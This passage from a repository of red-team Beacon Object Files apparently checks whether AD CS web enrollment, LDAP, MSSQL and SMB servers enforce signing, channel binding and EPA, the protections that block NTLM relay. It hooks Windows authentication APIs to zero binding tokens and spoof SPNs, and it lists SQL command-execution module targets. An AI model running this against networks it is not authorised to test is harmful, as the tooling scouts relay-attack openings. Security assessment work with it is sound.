    BOOL ssl = FALSE;

    // Parse URL into components
    URL_COMPONENTSW urlComp = {0};
    urlComp.dwStructSize = sizeof(URL_COMPONENTSW);
    urlComp.dwHostNameLength = (DWORD)-1;
    urlComp.dwUrlPathLength = (DWORD)-1;
    urlComp.dwSchemeLength = (DWORD)-1;

    if (!WINHTTP$WinHttpCrackUrl(URL, 0, 0, &urlComp)) {
        internal_printf("Failed to parse URL\n");
        return;
    }

    // Store hostname and path separately (ensure null-terminated copies)
    if (urlComp.lpszHostName && urlComp.dwHostNameLength > 0) {
        kHost = (wchar_t*)intAlloc((urlComp.dwHostNameLength + 1) * sizeof(wchar_t));
        if (!kHost) {
            internal_printf("Failed to allocate host buffer\n");
            return;
        }
        MSVCRT$memcpy(kHost, urlComp.lpszHostName, urlComp.dwHostNameLength * sizeof(wchar_t));
        kHost[urlComp.dwHostNameLength] = L'\0';
    }

    if (urlComp.lpszUrlPath && urlComp.dwUrlPathLength > 0) {
        kPath = (wchar_t*)intAlloc((urlComp.dwUrlPathLength + 1) * sizeof(wchar_t));
        if (!kPath) {
            intFree(kHost);
            internal_printf("Failed to allocate path buffer\n");
            return;
        }
        MSVCRT$memcpy(kPath, urlComp.lpszUrlPath, urlComp.dwUrlPathLength * sizeof(wchar_t));
        kPath[urlComp.dwUrlPathLength] = L'\0';
    } else {
        // Default to root path
        kPath = (wchar_t*)intAlloc(2 * sizeof(wchar_t));
        if (!kPath) {
            intFree(kHost);
            internal_printf("Failed to allocate default path buffer\n");
            return;
        }
        kPath[0] = L'/';
        kPath[1] = L'\0';
    }

    kPort = urlComp.nPort;
    ssl = (urlComp.nScheme == INTERNET_SCHEME_HTTPS);

	#ifndef BOF
    internal_printf("[DBG] Host: %ls, Path: %ls, Port: %lu, SSL: %d\n", kHost, kPath, kPort, ssl);
	#endif

	// Arm hardware breakpoints
	if (!ArmBps()){
		internal_printf("Failed to arm hardware breakpoints.\n");
		return;
	}


	g_forceNtlm = 1;

    // 1) Observe only
    g_cbtMode = 0; g_cbtModified = 0;
    DWORD baseline = trigger_winhttp_ntlm(kHost, kPath, kPort, ssl);
	if (baseline != 200) {
		// print the response
		internal_printf("[ERR] Baseline response: %lu\n", baseline);
		internal_printf("[ERR] Baseline request did not receive HTTP 200! Exiting...\n");

		if (baseline == 401) {
			internal_printf("[ERR] If using IP address, you may need to try hostname instead\n");
		}

		goto cleanup;
	}

	// 2) Zero CBT, and only for HTTPS
	DWORD zeroCBT;
	if (ssl) {
		g_cbtMode = 1; g_cbtModified = 0;
		zeroCBT = trigger_winhttp_ntlm(kHost, kPath, kPort, ssl);
	} else {
		zeroCBT = 200;
	}

    // 3) SPN override (service binding test)
    g_cbtMode = 0; g_cbtModified = 0;
    g_spnMode = 1; g_spnModified = 0;
    DWORD spnOverride = trigger_winhttp_ntlm(kHost, kPath, kPort, ssl);

	if (zeroCBT == 200 && spnOverride == 200) {
		internal_printf("[*] EPA is OFF\n");
	} else if (zeroCBT == 200 && spnOverride == 401) {
		internal_printf("[*] Invalid TargetName rejected!\n");
		internal_printf("[*] EPA is ACCEPT or REQUIRED (Service Binding)\n");
	} else if (zeroCBT == 401 && spnOverride == 200) {
		internal_printf("[*] Zeroed out channel binding token rejected!\n");
		internal_printf("[*] EPA is ACCEPT or REQUIRED (Channel Binding)\n");
	} else if (zeroCBT == 401 && spnOverride == 401) {
		internal_printf("[*] Invalid TargetName and zeroed out channel binding token rejected!\n");
		internal_printf("[!] This should not happen - EPA is UNKNOWN\n");
	} else {
		internal_printf("[*] EPA is UNKNOWN\n");
		internal_printf("[DBG] Invalid TargetName response: %lu\n", spnOverride);
		internal_printf("[DBG] Zeroed CBT response: %lu\n", zeroCBT);
	}

cleanup:
	//
    // Cleanup
	//
	if (kHost) { intFree(kHost); }
	if (kPath) { intFree(kPath); }
	HWBP_Clear(0);
	HWBP_ClearOnAllThreads(0);
	HWBP_Clear(1);
	HWBP_ClearOnAllThreads(1);
	HWBP_RemoveVeh(vehAchW);
	HWBP_RemoveVeh(vehIscW);

    return;
}

#ifdef BOF
VOID go(IN PCHAR Buffer, IN ULONG Length) {
    if(!bofstart()) { return; }

	datap parser;
	BeaconDataParse(&parser, Buffer, Length);
	
	wchar_t* kURL = (wchar_t*)BeaconDataExtract(&parser, NULL);	
	
	internal_printf("[*] Targeting URL: %ls\n", kURL);
	CheckProtection(kURL);

    printoutput(TRUE);
}
#else
int main() {
	CheckProtection(L"https://braavos.essos.local:443/certsrv/");
	//CheckProtection(L"http://braavos.essos.local:80/certsrv/");
	//CheckProtection(L"https://10.5.10.23/certsrv/");
    return 0;
}
#endif





================================================
FILE: AD-BOF/RelayInformer/relay-informer-ldap/entry.c
================================================
#include "bofdefs.h"
#include "base.c"

static wchar_t g_fakeSpnW[64] = L"LDAP/relay.informer";

#include "hwbp.c"

VERIFYSERVERCERT ServerCertCallback;
BOOLEAN _cdecl ServerCertCallback (PLDAP Connection, PCCERT_CONTEXT pServerCert)
{
	return TRUE;
}

// Forward declare to use inside SRV enumeration before actual definition appears below
static void CheckProtection(char* host);

// Minimal DNS SRV lookup using dnsapi.dll dynamically. We rely on types from windns.h via bofdefs.h includes.
typedef unsigned long (WINAPI *DnsQuery_A_t)(const char* name, unsigned short wType, unsigned long options, void* extra, PDNS_RECORDA* results, void** reserved);
typedef void (WINAPI *DnsRecordListFree_t)(PDNS_RECORDA pRecordList, int FreeType);

static void str_copy(char* dst, unsigned int dstSize, const char* src) {
    if (!dst || !src || dstSize == 0) return;
    unsigned int i = 0; for (; i + 1 < dstSize && src[i]; ++i) dst[i] = src[i]; dst[i] = '\0';
}

static void build_query(char* out, unsigned int outSize, const char* domain) {
    const char* prefix = "_ldap._tcp.dc._msdcs.";
    if (!out || outSize == 0) return;
    out[0] = '\0';
    unsigned int i = 0; for (; i + 1 < outSize && prefix[i]; ++i) out[i] = prefix[i];
    unsigned int j = 0; for (; i + 1 < outSize && domain && domain[j]; ++i, ++j) out[i] = domain[j];
    out[i] = '\0';
}

static void CheckAllDomainControllers(void) {
    char domain[256]; domain[0] = '\0';
    // GetComputerNameExA(ComputerNameDnsDomain = 2)
    DWORD sz = (DWORD)sizeof(domain);
    if (!KERNEL32$GetComputerNameExA((COMPUTER_NAME_FORMAT)2, domain, &sz)) domain[0] = '\0';
    if (!domain[0]) {
#ifndef BOF
        internal_printf("[LDAP] Could not determine DNS domain; aborting 'all' enumeration.\n");
#endif
        return;
    }

    char query[512]; build_query(query, sizeof(query), domain);

    PDNS_RECORDA recs = NULL;
    unsigned long status = DNSAPI$DnsQuery_A(query, 33 /*DNS_TYPE_SRV*/, 0, NULL, &recs, NULL);
    if (status != 0 || !recs) {
#ifndef BOF
        internal_printf("[LDAP] DnsQuery_A failed for %s (status=0x%08lX)\n", query, status);
#endif
        return;
    }

#ifndef BOF
    internal_printf("[LDAP] Enumerating DCs via %s\n", query);
#endif

    unsigned int srvCount = 0;
    for (PDNS_RECORDA c = recs; c; c = c->pNext) { if (c->wType == 33 /*DNS_TYPE_SRV*/) ++srvCount; }
    internal_printf("[*] Found %u DCs for %s\n", srvCount, domain);

    for (PDNS_RECORDA r = recs; r; r = r->pNext) {
        if (r->wType != 33 /*DNS_TYPE_SRV*/) continue;
        char* tgt = r->Data.SRV.pNameTarget;
        if (!tgt || !tgt[0]) continue;
        char hostBuf[260]; str_copy(hostBuf, sizeof(hostBuf), tgt);
        internal_printf("\n");
        CheckProtection(hostBuf);
    }

    DNSAPI$DnsRecordListFree(recs, DnsFreeRecordList);
}

static ULONG trigger_ldap_auth(char* host, BOOL ldaps) {
#ifndef BOF
    internal_printf("[DBG] Target: %s://%s\n", ldaps?"ldaps":"ldap", host);
#endif

    LDAP* pLdapConnection = NULL;

    ULONG result;
    int portNumber = ldaps == TRUE ? 636 : 389;

    pLdapConnection = WLDAP32$ldap_init(host, portNumber);

    if(ldaps == TRUE){

        ULONG version = LDAP_VERSION3;
        result = WLDAP32$ldap_set_optionW(pLdapConnection, LDAP_OPT_VERSION, (void*)&version);

        WLDAP32$ldap_get_optionW(pLdapConnection, LDAP_OPT_SSL, &result);  //LDAP_OPT_SSL
        if (result == 0){
            WLDAP32$ldap_set_optionW(pLdapConnection, LDAP_OPT_SSL, LDAP_OPT_ON);
        }

        WLDAP32$ldap_get_optionW(pLdapConnection, LDAP_OPT_SIGN, &result);  //LDAP_OPT_SIGN
        if (result == 0){
            WLDAP32$ldap_set_optionW(pLdapConnection, LDAP_OPT_SIGN, LDAP_OPT_ON);
        }

        WLDAP32$ldap_get_optionW(pLdapConnection, LDAP_OPT_ENCRYPT, &result);  //LDAP_OPT_ENCRYPT
        if (result == 0){
            WLDAP32$ldap_set_optionW(pLdapConnection, LDAP_OPT_ENCRYPT, LDAP_OPT_ON);
        }

        WLDAP32$ldap_set_optionW(pLdapConnection, LDAP_OPT_SERVER_CERTIFICATE, (void*)&ServerCertCallback ); //LDAP_OPT_SERVER_CERTIFICATE
    }

    if (pLdapConnection == NULL)
    {
        internal_printf("Failed to establish LDAP connection on %d.", portNumber);
        return -1;
    }

    ULONG lRtn = 0;
    lRtn = WLDAP32$ldap_bind_s(pLdapConnection, "", NULL, LDAP_AUTH_NTLM);

    if(lRtn != LDAP_SUCCESS)
    {
        WLDAP32$ldap_unbind(pLdapConnection);
        pLdapConnection = NULL; 
        return lRtn;
    }

    return lRtn;
}

void CheckProtection(char* host) {
    // No need to arm AcquireCredentialsHandleW since we can control the auth mechanism in WLDAP32$ldap_bind_s()
    PVOID vehIscW = NULL; void* addrIscW = NULL;
    if (!HWBP_SetOnApiEx("sspicli.dll", "InitializeSecurityContextW", 1, ISC_VEH, &vehIscW, &addrIscW, FALSE)) {
		internal_printf("Failed to set HWBP on sspicli!InitializeSecurityContextW (DR1).\n");
		return;
	}

    g_stripProtFlags = 1;
    ULONG noSigning = trigger_ldap_auth(host, FALSE);

    if (noSigning == LDAP_STRONG_AUTH_REQUIRED) {
        internal_printf("[%s] (LDAP) server ALWAYS REQUIRES signing\n", host);
    } else if (noSigning == LDAP_SUCCESS) {
        internal_printf("[%s] (LDAP) server signing requirement is OFF\n", host);
    } else {
        internal_printf("[%s] (LDAP) signing requirement unknown - result code:%lu\n", host, noSigning);
    }

    g_stripProtFlags = 0;
    g_cbtMode = 1; g_cbtModified = 0;
    ULONG zeroCBT = trigger_ldap_auth(host, TRUE);
    
    if (zeroCBT == LDAP_INVALID_CREDENTIALS) {
        internal_printf("[%s] (LDAPS) channel binding token requirement is set to ALWAYS or WHEN SUPPORTED\n", host);
    } else if (zeroCBT == LDAP_SUCCESS) {
        internal_printf("[%s] (LDAPS) channel binding token requirement is set to NEVER\n", host);
    } else {
        internal_printf("[%s] (LDAPS) channel binding token requirement unknown - result code:%lu\n", host, zeroCBT);
    }

    // Cleanup
    HWBP_Clear(1);  // DR1 (ISC-W)
    HWBP_RemoveVeh(vehIscW);
    return;
}

#ifdef BOF
VOID go(IN PCHAR Buffer, IN ULONG Length) {
    if(!bofstart()) { return; }

	datap parser;
	BeaconDataParse(&parser, Buffer, Length);
	
    char* host = (char*)BeaconDataExtract(&parser, NULL);

	//ensure not null
	if (!host) {
		internal_printf("[ERR] Host is null\n");
		return;
	}

	if (MSVCRT$_strnicmp(host, "all", 3) == 0 && (host[3] == '\0' || host[3] == '\n')) {
		CheckAllDomainControllers();
	} else {
		CheckProtection(host);
	}

    printoutput(TRUE);
}
#else
int main() {
	//
	// Constants for testing
	//
	//char* host = "10.5.10.12";
    //char* host = "meereen.essos.local";
    char* host = "all";

	if (MSVCRT$_strnicmp(host, "all", 3) == 0 && (host[3] == '\0' || host[3] == '\n')) {
		CheckAllDomainControllers();
	} else {
		CheckProtection(host);
	}

    return 0;
}
#endif





================================================
FILE: AD-BOF/RelayInformer/relay-informer-mssql/entry.c
================================================
#include "bofdefs.h"
#include "base.c"
#include "sql.c"

static const wchar_t g_fakeSpnW[] = L"MSSQLSvc/relay.informer";

#include "hwbp.c"

static SQLINTEGER trigger_sql_auth(char* host, int port, char* database) {
    SQLHENV env		= NULL;
    SQLHSTMT stmt 	= NULL;
	SQLHDBC dbc 	= NULL;
	SQLRETURN ret;

    // native error code is our indicator of EPA enforcement
    SQLINTEGER nativeError = 0;

	dbc = ConnectToSqlServer(&env, host, port, database, &nativeError);

    DisconnectSqlServer(env, dbc, stmt);
       
    return nativeError;
}

void CheckProtection(char* host, int port, char* database) {
    // Quick TDS PreLogin probe for encryption policy
    int enc = TdsPreloginCheckEncryption(host, (unsigned short)port);

    #ifndef BOF
    internal_printf("[DBG] TDS PreLogin ENCRYPTION=%d (0=OFF,1=ON,2=NOT_SUP,3=REQUIRE)\n", enc);
    #endif

    if (enc == -1) {
        internal_printf("[ERR] Failed to connect to SQL Server\n");
        return;
    }
    
    // Arm DR-based hardware breakpoints using sspicli exports and existing VEH handlers
    PVOID vehAchA = NULL; void* addrAchA = NULL;
    if (!HWBP_SetOnApiEx("sspicli.dll", "AcquireCredentialsHandleA", 0, ACH_A_VEH, &vehAchA, &addrAchA, FALSE)) {
		internal_printf("Failed to set HWBP on sspicli!AcquireCredentialsHandleW (DR0).\n");
		return;
	}
    
    PVOID vehIscA = NULL; void* addrIscA = NULL;
    if (!HWBP_SetOnApiEx("sspicli.dll", "InitializeSecurityContextA", 1, ISC_A_VEH, &vehIscA, &addrIscA, FALSE)) {
		internal_printf("Failed to set HWBP on sspicli!InitializeSecurityContextW (DR1).\n");
		return;
	}

    g_forceNtlm = 1;
    g_cbtMode = 0; g_cbtModified = 0;

    // will hold the native error code from ODBC32$SQLGetDiagRec
    // and will be used to determine EPA enforcement
    SQLINTEGER result = 0;

    switch (enc) {
        case 0:
            // SPN override (service binding test)
            internal_printf("[*] Force Encryption is OFF, checking service binding...\n");
            g_spnMode = 1; g_spnModified = 0;
            result = trigger_sql_auth(host, port, database);
            g_spnMode = 0; g_spnModified = 0;
            break;

        case 1:
            break;
        case 2:
            break;
        case 3:
            // SQL Driver used sends an all 0x00 CBT
            // this will fail if EPA is allowed/required
            internal_printf("[*] ForceEncryption is ON, checking channel binding...\n");
            result = trigger_sql_auth(host, port, database);
            break;
    }

    // if result is 18456 (login failed) then EPA is off 
    // and our user does not have access to the database
    if (result == 18456) {    
        internal_printf("[*] EPA is OFF\n");
    }
    // if result is 18452 (login is from an untrusted domain/integrated auth)
    // then EPA is allowed or required
    else if (result == 18452) {
        internal_printf("[*] EPA is ALLOWED or REQUIRED\n");
    }
    // if result is 0 (login succeeded) then EPA is off
    else {
        internal_printf("[*] EPA is OFF\n");
        internal_printf("[+] Database login successful, we have access to the database\n");
    }

    //
    // Cleanup
    //
    HWBP_Clear(0);
    HWBP_Clear(1);
    HWBP_RemoveVeh(vehAchA);
    HWBP_RemoveVeh(vehIscA);
    return;
}

#ifdef BOF
VOID go(IN PCHAR Buffer, IN ULONG Length) {
    if(!bofstart()) { return; }

	datap parser;
	BeaconDataParse(&parser, Buffer, Length);
	
	char* host = (char*)BeaconDataExtract(&parser, NULL);
	int port = BeaconDataInt(&parser);
    char* database = (char*)BeaconDataExtract(&parser, NULL);

    if (!database) {
        database = "master";
    }

    //ensure not null
	if (!host || !port) {
		internal_printf("[ERR] Host or port is null\n");
		return;
	}

    internal_printf("[*] Target: mssql://%s:%d\n", host, port);
	CheckProtection(host, port, database);

    printoutput(TRUE);
}
#else
int main() {
	//
	// Constants for testing
	//
	//char* host = "10.5.10.22";
    char* host = "castelblack.north.sevenkingdoms.local";
	int port = 1433;
    char* database = "master";

	CheckProtection(host, port, database);

    return 0;
}
#endif





================================================
FILE: AD-BOF/RelayInformer/relay-informer-smb/entry.c
================================================
//
// Claude to the rescue
//

#include "bofdefs.h"
#include "base.c"

// Minimal SMB2 NEGOTIATE probe to read server SecurityMode
// Returns: -1 on error; otherwise SecurityMode bits from NEGOTIATE Response
//  bit0 (0x01): SIGNING_ENABLED; bit1 (0x02): SIGNING_REQUIRED
static int Smb2ProbeSecurityMode(const char* host)
{
    WSADATA wsa; if (WS2_32$WSAStartup(MAKEWORD(2,2), &wsa) != 0) return -1;
    SOCKET s = WS2_32$socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (s == INVALID_SOCKET) { WS2_32$WSACleanup(); return -1; }

    struct sockaddr_in sin; intZeroMemory(&sin, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_port = WS2_32$htons(445);
    if (WS2_32$inet_pton(AF_INET, host, &sin.sin_addr) != 1) {
        struct addrinfo hints; intZeroMemory(&hints, sizeof(hints));
        hints.ai_family = AF_INET; hints.ai_socktype = SOCK_STREAM; hints.ai_protocol = IPPROTO_TCP;
        struct addrinfo* res = NULL;
        if (WS2_32$getaddrinfo(host, NULL, &hints, &res) == 0 && res) {
            struct sockaddr_in* ain = (struct sockaddr_in*)res->ai_addr;
            sin.sin_addr = ain->sin_addr;
            WS2_32$freeaddrinfo(res);
        } else { WS2_32$closesocket(s); WS2_32$WSACleanup(); return -1; }
    }

    if (WS2_32$connect(s, (struct sockaddr*)&sin, sizeof(sin)) != 0) { WS2_32$closesocket(s); WS2_32$WSACleanup(); return -1; }

    // SMB2 NEGOTIATE request over TCP (no NetBIOS session service header needed on modern stacks)
    // Structure sizes and fields follow MS-SMB2; this is a minimal dialect list (0x0202, 0x0311)
    unsigned char req[200]; int p = 0;
    // Framing: NetBIOS Session Service header (RFC 1002) is still used: 1 byte type (0x00), 3-byte length
    // We'll fill length later. Type=0x00 Session Message.
    int nbLenPos = p; req[p++] = 0x00; req[p++] = 0x00; req[p++] = 0x00; req[p++] = 0x00;

    // SMB2 Header (64 bytes)
    // ProtocolId: 0xFE,'S','M','B'
    req[p++] = 0xFE; req[p++] = 'S'; req[p++] = 'M'; req[p++] = 'B';
    // StructureSize (2)
    req[p++] = 0x40; req[p++] = 0x00;
    // CreditCharge (2)
    req[p++] = 0x00; req[p++] = 0x00;
    // ChannelSequence (2) + Reserved (2)
    req[p++] = 0x00; req[p++] = 0x00; // ChannelSequence
    req[p++] = 0x00; req[p++] = 0x00; // Reserved
    // Command (2) = NEGOTIATE(0)
    req[p++] = 0x00; req[p++] = 0x00;
    // CreditRequest (2)
    req[p++] = 0x00; req[p++] = 0x00;
    // Flags (4)
    req[p++] = 0x00; req[p++] = 0x00; req[p++] = 0x00; req[p++] = 0x00;
    // NextCommand (4)
    req[p++] = 0x00; req[p++] = 0x00; req[p++] = 0x00; req[p++] = 0x00;
    // MessageId (8)
    for (int i = 0; i < 8; i++) req[p++] = 0x00;
    // Reserved (4)
    for (int i = 0; i < 4; i++) req[p++] = 0x00;
    // TreeId (4)
    for (int i = 0; i < 4; i++) req[p++] = 0x00;
    // SessionId (8)
    for (int i = 0; i < 8; i++) req[p++] = 0x00;
    // Signature (16)
    for (int i = 0; i < 16; i++) req[p++] = 0x00;

    // SMB2 NEGOTIATE Request body
    int bodyStart = p;
    req[p++] = 0x24; req[p++] = 0x00; // StructureSize = 36
    req[p++] = 0x01; req[p++] = 0x00; // DialectCount = 1
    req[p++] = 0x00; req[p++] = 0x00; // SecurityMode (client caps) - leave 0
    req[p++] = 0x00; req[p++] = 0x00; // Reserved
    // Capabilities (4)
    req[p++] = 0x00; req[p++] = 0x00; req[p++] = 0x00; req[p++] = 0x00;
    // ClientGUID (16)
    for (int i = 0; i < 16; i++) req[p++] = (unsigned char)MSVCRT$rand();
    // For SMB2.1 and earlier: ClientStartTime (8)
    req[p++] = 0x00; req[p++] = 0x00; req[p++] = 0x00; req[p++] = 0x00;
    req[p++] = 0x00; req[p++] = 0x00; req[p++] = 0x00; req[p++] = 0x00;
    // Dialects (2 each)
    req[p++] = 0x10; req[p++] = 0x02; // 0x0210 (SMB 2.1)

    // Patch NetBIOS length (big-endian 3 bytes) excluding the first header byte
    int smbLen = p - 4; // after 4-byte NBSS header
    req[nbLenPos + 1] = (unsigned char)((smbLen >> 16) & 0xFF);
    req[nbLenPos + 2] = (unsigned char)((smbLen >> 8) & 0xFF);
    req[nbLenPos + 3] = (unsigned char)(smbLen & 0xFF);

    if (WS2_32$send(s, (const char*)req, p, 0) != p) { WS2_32$closesocket(s); WS2_32$WSACleanup(); return -1; }

    // Read NBSS header then rest
    unsigned char hdr[4]; int rcv = 0;
    while (rcv < 4) {
        int r = WS2_32$recv(s, (char*)hdr + rcv, 4 - rcv, 0);
        if (r <= 0) { WS2_32$closesocket(s); WS2_32$WSACleanup(); return -1; }
        rcv += r;
    }
    if (hdr[0] != 0x00) { WS2_32$closesocket(s); WS2_32$WSACleanup(); return -1; }
    int payloadLen = ((int)hdr[1] << 16) | ((int)hdr[2] << 8) | hdr[3];
    if (payloadLen <= 0 || payloadLen > 0xFFFF) { WS2_32$closesocket(s); WS2_32$WSACleanup(); return -1; }

    unsigned char* buf = (unsigned char*)intAlloc((size_t)payloadLen);
    if (!buf) { WS2_32$closesocket(s); WS2_32$WSACleanup(); return -1; }
    int got = 0;
    while (got < payloadLen) {
        int r = WS2_32$recv(s, (char*)buf + got, payloadLen - got, 0);
        if (r <= 0) break; got += r;
    }

    WS2_32$closesocket(s);
    WS2_32$WSACleanup();

    int result = -1;
    if (got >= 64 + 2) { // need SMB2 header + at least start of body
        // Validate SMB2 header
        if (buf[0] == 0xFE && buf[1] == 'S' && buf[2] == 'M' && buf[3] == 'B') {
            // Command should be NEGOTIATE (0)
            if (buf[12] == 0x00 && buf[13] == 0x00) {
                // NEGOTIATE Response body follows header
                const unsigned char* body = buf + 64;
                // StructureSize (2) should be 65 for response; SecurityMode (2) at offset 2
                int respStruct = body[0] | (body[1] << 8);
                if (respStruct >= 65) {
                    int securityMode = body[2] | (body[3] << 8);
                    result = securityMode & 0x03; // enabled/required bits
                }
            }
        }
    }
    intFree(buf);
    return result;
}

void CheckProtection(const char* host) {
    internal_printf("[*] Target: smb://%s\n", host);
    int sm = Smb2ProbeSecurityMode(host);
    if (sm < 0) {
        internal_printf("[ERR] Probe failed or no response\n");
    } else {
        BOOL enabled = (sm & 0x01) != 0;
        BOOL required = (sm & 0x02) != 0;
        
        if (enabled && required) {
            internal_printf("[*] SMB2 SecurityMode: Signing is ENABLED and REQUIRED\n");
        } else if (enabled) {
            internal_printf("[*] SMB2 SecurityMode: Signing is ENABLED but NOT REQUIRED\n");
        } else {
            internal_printf("[*] SMB2 SecurityMode: Signing is DISABLED\n");
        }
    }
}

#ifdef BOF
VOID go(IN PCHAR Buffer, IN ULONG Length)
{
    if(!bofstart()) { return; }

    datap parser; BeaconDataParse(&parser, Buffer, Length);
    char* host = (char*)BeaconDataExtract(&parser, NULL);
    
    if (!host) {
        internal_printf("[ERR] host is required\n");
        return;
    }

    CheckProtection(host);

    printoutput(TRUE);
}
#else
int main()
{
    const char* host = "castelblack.north.sevenkingdoms.local";
    CheckProtection(host);
    return 0;
}
#endif




================================================
FILE: AD-BOF/SQL-BOF/CMakeLists.txt
================================================
cmake_minimum_required(VERSION 3.16)

set(CMAKE_C_STANDARD 99)

# Include directories
include_directories(
    ${CMAKE_SOURCE_DIR}/_include
    ${CMAKE_CURRENT_SOURCE_DIR}/src/common
)

# Compiler flags
set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -Os -w -Wno-incompatible-pointer-types -DBOF")
set(CMAKE_C_FLAGS_RELEASE "${CMAKE_C_FLAGS_RELEASE} -s")

# SQL BOF targets
add_library(sql_1434udp OBJECT src/SQL/1434udp/entry.c)
add_library(sql_adsi OBJECT src/SQL/adsi/entry.c)
add_library(sql_agentcmd OBJECT src/SQL/agentcmd/entry.c)
add_library(sql_agentstatus OBJECT src/SQL/agentstatus/entry.c)
add_library(sql_checkrpc OBJECT src/SQL/checkrpc/entry.c)
add_library(sql_clr OBJECT src/SQL/clr/entry.c)
add_library(sql_columns OBJECT src/SQL/columns/entry.c)
add_library(sql_databases OBJECT src/SQL/databases/entry.c)
add_library(sql_togglemodule OBJECT src/SQL/togglemodule/entry.c)
add_library(sql_impersonate OBJECT src/SQL/impersonate/entry.c)
add_library(sql_info OBJECT src/SQL/info/entry.c)
add_library(sql_links OBJECT src/SQL/links/entry.c)
add_library(sql_olecmd OBJECT src/SQL/olecmd/entry.c)
add_library(sql_query OBJECT src/SQL/query/entry.c)
add_library(sql_rows OBJECT src/SQL/rows/entry.c)
add_library(sql_search OBJECT src/SQL/search/entry.c)
add_library(sql_smb OBJECT src/SQL/smb/entry.c)
add_library(sql_tables OBJECT src/SQL/tables/entry.c)
add_library(sql_users OBJECT src/SQL/users/entry.c)
add_library(sql_whoami OBJECT src/SQL/whoami/entry.c)
add_library(sql_xpcmd OBJECT src/SQL/xpcmd/entry.c)

# Create _bin directory
file(MAKE_DIRECTORY ${CMAKE_CURRENT_SOURCE_DIR}/_bin/SQL)

# Macro for copy targets
macro(sql_copy_target target_name output_name)
    add_custom_target(copy_${target_name} ALL
        COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:${target_name}> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/SQL/${output_name}.x64.o
        DEPENDS ${target_name}
        COMMENT "Copying ${output_name} object file"
    )
endmacro()

# Copy targets
sql_copy_target(sql_1434udp 1434udp)
sql_copy_target(sql_adsi adsi)
sql_copy_target(sql_agentcmd agentcmd)
sql_copy_target(sql_agentstatus agentstatus)
sql_copy_target(sql_checkrpc checkrpc)
sql_copy_target(sql_clr clr)
sql_copy_target(sql_columns columns)
sql_copy_target(sql_databases databases)
sql_copy_target(sql_togglemodule togglemodule)
sql_copy_target(sql_impersonate impersonate)
sql_copy_target(sql_info info)
sql_copy_target(sql_links links)
sql_copy_target(sql_olecmd olecmd)
sql_copy_target(sql_query query)
sql_copy_target(sql_rows rows)
sql_copy_target(sql_search search)
sql_copy_target(sql_smb smb)
sql_copy_target(sql_tables tables)
sql_copy_target(sql_users users)
sql_copy_target(sql_whoami whoami)
sql_copy_target(sql_xpcmd xpcmd)


================================================
FILE: AD-BOF/SQL-BOF/LICENSE
================================================
                    GNU GENERAL PUBLIC LICENSE
                       Version 2, June 1991

 Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
 Everyone is permitted to copy and distribute verbatim copies
 of this license document, but changing it is not allowed.

                            Preamble

  The licenses for most software are designed to take away your
freedom to share and change it.  By contrast, the GNU General Public
License is intended to guarantee your freedom to share and change free
software--to make sure the software is free for all its users.  This
General Public License applies to most of the Free Software
Foundation's software and to any other program whose authors commit to
using it.  (Some other Free Software Foundation software is covered by
the GNU Lesser General Public License instead.)  You can apply it to
your programs, too.

  When we speak of free software, we are referring to freedom, not
price.  Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
this service if you wish), that you receive source code or can get it
if you want it, that you can change the software or use pieces of it
in new free programs; and that you know you can do these things.

  To protect your rights, we need to make restrictions that forbid
anyone to deny you these rights or to ask you to surrender the rights.
These restrictions translate to certain responsibilities for you if you
distribute copies of the software, or if you modify it.

  For example, if you distribute copies of such a program, whether
gratis or for a fee, you must give the recipients all the rights that
you have.  You must make sure that they, too, receive or can get the
source code.  And you must show them these terms so they know their
rights.

  We protect your rights with two steps: (1) copyright the software, and
(2) offer you this license which gives you legal permission to copy,
distribute and/or modify the software.

  Also, for each author's protection and ours, we want to make certain
that everyone understands that there is no warranty for this free
software.  If the software is modified by someone else and passed on, we
want its recipients to know that what they have is not the original, so
that any problems introduced by others will not reflect on the original
authors' reputations.

  Finally, any free program is threatened constantly by software
patents.  We wish to avoid the danger that redistributors of a free
program will individually obtain patent licenses, in effect making the
program proprietary.  To prevent this, we have made it clear that any
patent must be licensed for everyone's free use or not licensed at all.

  The precise terms and conditions for copying, distribution and
modification follow.

                    GNU GENERAL PUBLIC LICENSE
   TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION

  0. This License applies to any program or other work which contains
a notice placed by the copyright holder saying it may be distributed
under the terms of this General Public License.  The "Program", below,
refers to any such program or work, and a "work based on the Program"
means either the Program or any derivative work under copyright law:
that is to say, a work containing the Program or a portion of it,
either verbatim or with modifications and/or translated into another
language.  (Hereinafter, translation is included without limitation in
the term "modification".)  Each licensee is addressed as "you".

Activities other than copying, distribution and modification are not
covered by this License; they are outside its scope.  The act of
running the Program is not restricted, and the output from the Program
is covered only if its contents constitute a work based on the
Program (independent of having been made by running the Program).
Whether that is true depends on what the Program does.

  1. You may copy and distribute verbatim copies of the Program's
source code as you receive it, in any medium, provided that you
conspicuously and appropriately publish on each copy an appropriate
copyright notice and disclaimer of warranty; keep intact all the
notices that refer to this License and to the absence of any warranty;
and give any other recipients of the Program a copy of this License
along with the Program.

You may charge a fee for the physical act of transferring a copy, and
you may at your option offer warranty protection in exchange for a fee.

  2. You may modify your copy or copies of the Program or any portion
of it, thus forming a work based on the Program, and copy and
distribute such modifications or work under the terms of Section 1
above, provided that you also meet all of these conditions:

    a) You must cause the modified files to carry prominent notices
    stating that you changed the files and the date of any change.

    b) You must cause any work that you distribute or publish, that in
    whole or in part contains or is derived from the Program or any
    part thereof, to be licensed as a whole at no charge to all third
    parties under the terms of this License.

    c) If the modified program normally reads commands interactively
    when run, you must cause it, when started running for such
    interactive use in the most ordinary way, to print or display an
    announcement including an appropriate copyright notice and a
    notice that there is no warranty (or else, saying that you provide
    a warranty) and that users may redistribute the program under
    these conditions, and telling the user how to view a copy of this
    License.  (Exception: if the Program itself is interactive but
    does not normally print such an announcement, your work based on
    the Program is not required to print an announcement.)

These requirements apply to the modified work as a whole.  If
identifiable sections of that work are not derived from the Program,
and can be reasonably considered independent and separate works in
themselves, then this License, and its terms, do not apply to those
sections when you distribute them as separate works.  But when you
distribute the same sections as part of a whole which is a work based
on the Program, the distribution of the whole must be on the terms of
